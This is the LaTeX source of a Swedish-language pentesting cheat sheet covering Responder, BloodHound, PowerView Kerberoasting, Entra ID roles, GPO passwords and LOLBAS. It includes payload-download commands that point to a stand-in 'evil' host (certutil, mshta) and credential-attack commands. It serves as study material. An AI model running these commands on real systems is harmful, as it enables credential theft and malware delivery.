\begin{tabularx}{8.4cm}{x{2.72 cm} x{5.28 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Responder}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\emph{Waits for ``incorrect'' authentications to get the NTLM hash. Pretends to be the correct service. Requires {\bf{root}}. Catches \seqsplit{challenge-response-hashes} from NTLM-auth.}}} \tn % Row Count 4 (+ 4) % Row 1 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\emph{Challenge-response, inte en pwd-hash. 
NTLM != NetNTLMv1/v2}}} \tn % Row Count 6 (+ 2) % Row 2 \SetRowColor{LightBackground} {\bf{responder -I eth0}} & Start \tn % Row Count 8 (+ 2) % Row 3 \SetRowColor{white} NetNTLMv1 & Äldre, svagare challenge response -{}-\textgreater{} 5500 - hashcat \tn % Row Count 11 (+ 3) % Row 4 \SetRowColor{LightBackground} NetNTLMv2 & Nyare, starkare - vanligt i moderna Windows -{}-\textgreater{} 5600 hashcat \tn % Row Count 14 (+ 3) % Row 5 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{\seqsplit{username::DOMAIN:challenge:response:blob}} \tn % Row Count 15 (+ 1) % Row 6 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{\seqsplit{USERNAME::DOMAIN:1122334455667788:0123456789ABCDEF0123456789ABCDEF:0102030405060708090A0B0C0D0E0F10}} \tn % Row Count 17 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}--} \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{Hasharna anv{\"a}nds fr{\"a}ms f{\"o}r att kn{\"a}ckas, inte som tex PtH} \tn \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Bloodhound/Sharphound}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\emph{Kartl{\"a}gger beh{\"o}righetsv{\"a}gar i Active Directory. Hj{\"a}lper till att hitta privilege escalation-paths. Sharphound(CLI) samlar in AD-data. L{\"a}ser in i Bloodhound(GUI)}}} \tn % Row Count 4 (+ 4) % Row 1 \SetRowColor{white} {\bf{Invoke-BloodHound -CollectionMethod All}} & Powershellversionen av Sharphound. K{\"o}rs i minnet. Resultat: Zip som l{\"a}ses in i BH \tn % Row Count 9 (+ 5) % Row 2 \SetRowColor{LightBackground} {\bf{SharpHound.exe -c All}} & Bin{\"a}r. Anv{\"a}nds om PS {\"a}r blockat. 
Resultat: Zip som l{\"a}ses in i BH \tn % Row Count 13 (+ 4) % Row 3 \SetRowColor{white} {\bf{Invoke-BloodHound -Domain LAB.local -Username hacker -Password hemligt123}} & Specificera dom{\"a}n \tn % Row Count 17 (+ 4) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{p{0.8 cm} p{0.8 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Cain}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\emph{Sniffar, fångar och kn{\"a}cker l{\"o}senord och hashar i ett lokalt n{\"a}tverk. Kr{\"a}ver administrat{\"o}r. GUI-verktyg. Fr{\"a}mst Windows fokus}}} \tn % Row Count 3 (+ 3) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{3.36 cm} x{4.64 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Azure \& Entra ID}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{\{\{border=1\}\} {\bf{Struktur }}} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} Tenants & Isolerad instans av EntraID \tn % Row Count 3 (+ 2) % Row 2 \SetRowColor{LightBackground} Users & Interna och externa \tn % Row Count 4 (+ 1) % Row 3 \SetRowColor{white} Roles & RBAC f{\"o}r att styra vad anv{\"a}ndaren kan g{\"o}ra \tn % Row Count 6 (+ 2) % Row 4 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{\{\{border=1\}\} {\bf{Roller}}} \tn % Row Count 7 (+ 1) % Row 5 \SetRowColor{white} Global Administrator & Full kontroll {\"o}ver allt \tn % Row Count 9 (+ 2) % Row 6 \SetRowColor{LightBackground} Privileged Role Administrator & Hanterar roller. 
Kan ge sig sj{\"a}lv Global Admin \tn % Row Count 12 (+ 3) % Row 7 \SetRowColor{white} Application Developer & Registrera appar och ge dom API-access \tn % Row Count 14 (+ 2) % Row 8 \SetRowColor{LightBackground} Security Reader & Kan l{\"a}sa s{\"a}k.konf, men ej {\"a}ndra \tn % Row Count 16 (+ 2) % Row 9 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{\{\{border=1\}\} {\bf{Misc}}} \tn % Row Count 17 (+ 1) % Row 10 \SetRowColor{LightBackground} Service Principal & Kopplar app till EntraID dvs g{\"o}r appen k{\"o}rbar \tn % Row Count 20 (+ 3) % Row 11 \SetRowColor{white} App Registration & App som skapats av tenant. Innehåller konfig, beh{\"o}righeter och secrets \tn % Row Count 24 (+ 4) % Row 12 \SetRowColor{LightBackground} Enterprise Application & Faktiska instansen (Service Principal) av en app i en tenant \tn % Row Count 27 (+ 3) % Row 13 \SetRowColor{white} Conditional Access & Styra n{\"a}r, var och hur anv{\"a}ndare får åtkomst till resurser – baserat på olika villkor -{}-\textgreater{} MFA \tn % Row Count 32 (+ 5) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{3.36 cm} x{4.64 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Azure \& Entra ID (cont)}} \tn % Row 14 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{\{\{border=1\}\} {\bf{Attack}}} \tn % Row Count 1 (+ 1) % Row 15 \SetRowColor{white} Shadow admin & App kan få admin-r{\"a}ttigheter i smyg, via API-beh{\"o}righeter \tn % Row Count 4 (+ 3) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4.8 cm} x{3.2 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{\seqsplit{PowerSploit/PowerView/Empire}}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{\{\{border=1\}\} {\bf{PowerSploit}}} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\emph{Samling offensiva Powershell-script. 
Anv{\"a}nds ofta från RAM. Innehåller PowerView, PowerUp etc}}} \tn % Row Count 3 (+ 2) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{PowerSploit.psd1}}} \tn % Row Count 4 (+ 1) % Row 3 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{\{\{border=1\}\} {\bf{PowerView}}} \tn % Row Count 5 (+ 1) % Row 4 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\emph{Recon-delen i PowerSploit (AD-enumerering). L{\"a}ses in direkt i minnet (iex)}}} \tn % Row Count 7 (+ 2) % Row 5 \SetRowColor{white} {\bf{Import-Module PowerView.ps1`}} & Starta modul \tn % Row Count 9 (+ 2) % Row 6 \SetRowColor{LightBackground} {\bf{Invoke-Kerberoast}} & Dra ut TGS f{\"o}r crack \tn % Row Count 11 (+ 2) % Row 7 \SetRowColor{white} {\bf{Get-DomainUser -SPN}} & Information om DC \tn % Row Count 13 (+ 2) % Row 8 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{\{\{border=1\}\} {\bf{Empire}}} \tn % Row Count 14 (+ 1) % Row 9 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\emph{Post-exploit-ramverk (C2) med f{\"a}rdiga moduler ex. PowerView. Liknar Metasploit i syntaxen}}} \tn % Row Count 16 (+ 2) % Row 10 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{CLI-kommandon (listeners, usestager, agents} \tn % Row Count 17 (+ 1) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{3.52 cm} x{4.48 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{AD}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\emph{Group Policy Objects (GPOs) anv{\"a}nds f{\"o}r att centralt styra konfigurationer på anv{\"a}ndare och datorer i en Active Directory-dom{\"a}n. EJ EntraID}}} \tn % Row Count 3 (+ 3) % Row 1 \SetRowColor{white} Group Policy–managed passwords & Finns i Groups.xml på SYSVOL. Kr{\"a}ver endast giltigt domain user account f{\"o}r att l{\"a}sa filen. AES-kryptering. 
\tn % Row Count 9 (+ 6) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\emph{Group Policy Store}}} \tn % Row Count 10 (+ 1) % Row 3 \SetRowColor{white} SYSVOL & Filbaserad. Skript, inst{\"a}llningsfiler, templates \tn % Row Count 13 (+ 3) % Row 4 \SetRowColor{LightBackground} AD & Katalogbaserad. Metadata: namn, l{\"a}nkar, versionsnummer \tn % Row Count 16 (+ 3) % Row 5 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{ATTACKER}}} \tn % Row Count 17 (+ 1) % Row 6 \SetRowColor{LightBackground} Golden SAML & Certifikatskapning m{\"o}jligg{\"o}r falsk autentisering \tn % Row Count 20 (+ 3) % Row 7 \SetRowColor{white} Token replays & Missbruk av tokens (OpenID \& OAuth 2.0) \tn % Row Count 22 (+ 2) % Row 8 \SetRowColor{LightBackground} AAD Connect & Synkar konton från AD till Entra ID. Om servern komprometteras -\textgreater{} Dumpa NT-hashar \tn % Row Count 26 (+ 4) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4.96 cm} x{3.04 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{LOLBAS}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\emph{Ladda ned payloads, k{\"o}ra kod dolt, persistence}}} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} {\bf{certutil -urlcache -f http://evil/payload.exe payload.exe}} & Legitimate purpose: handling certificates \tn % Row Count 4 (+ 3) % Row 2 \SetRowColor{LightBackground} {\bf{mshta http://evil/malicious.hta}} & Legitimate purpose: executing HTML applications \tn % Row Count 6 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{p{0.8 cm} p{0.8 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{MISC}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{} \tn % Row Count 0 (+ 0) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } 
\SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Misc}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{\{\{border=1\}\} {\bf{Lista portar}}} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} netstat -antp | grep LISTEN & Lists open ports/connections \tn % Row Count 3 (+ 2) % Row 2 \SetRowColor{LightBackground} \seqsplit{Get-NetTCPConnection} -State Listen & Lists open ports/connections (PowerShell) \tn % Row Count 6 (+ 3) % Row 3 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{\{\{border=1\}\} {\bf{ Lista grupper }}} \tn % Row Count 7 (+ 1) % Row 4 \SetRowColor{LightBackground} net localgroup "Administrators" & Lista administrat{\"o}rer \tn % Row Count 9 (+ 2) % Row 5 \SetRowColor{white} \seqsplit{Get-LocalGroupMember} -Name "Administrators" & Lista administrat{\"o}rer \tn % Row Count 12 (+ 3) % Row 6 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{\{\{border=1\}\} {\bf{ Lista firewall states }}} \tn % Row Count 13 (+ 1) % Row 7 \SetRowColor{white} \seqsplit{Get-NetFirewallProfile} | Select Name,Enabled & Lista firewall states \tn % Row Count 16 (+ 3) % Row 8 \SetRowColor{LightBackground} netsh advfirewall show allprofiles & Lista firewall states \tn % Row Count 18 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{1.44 cm} x{6.56 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Common ports}} \tn % Row 0 \SetRowColor{LightBackground} 21 & FTP \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} 22 & SSH \& SFTP \tn % Row Count 2 (+ 1) % Row 2 \SetRowColor{LightBackground} 23 & Telnet \tn % Row Count 3 (+ 1) % Row 3 \SetRowColor{white} 69 & TFTP \tn % Row Count 4 (+ 1) % Row 4 \SetRowColor{LightBackground} 88 & (TCP och UDP): Kerberos Key Distribution Center (KDC) \tn % Row Count 6 (+ 2) % Row 5 \SetRowColor{white} 445 & SMB \tn % Row Count 7 (+ 1) % Row 6 \SetRowColor{LightBackground} 2049 & NFS \tn % Row Count 8 (+ 1) 
% Row 7 \SetRowColor{white} 3389 & RDP \tn % Row Count 9 (+ 1) % Row 8 \SetRowColor{LightBackground} \seqsplit{5985/5986} & WinRM (http/https) \tn % Row Count 11 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} % That's all folks \end{multicols*} \end{document}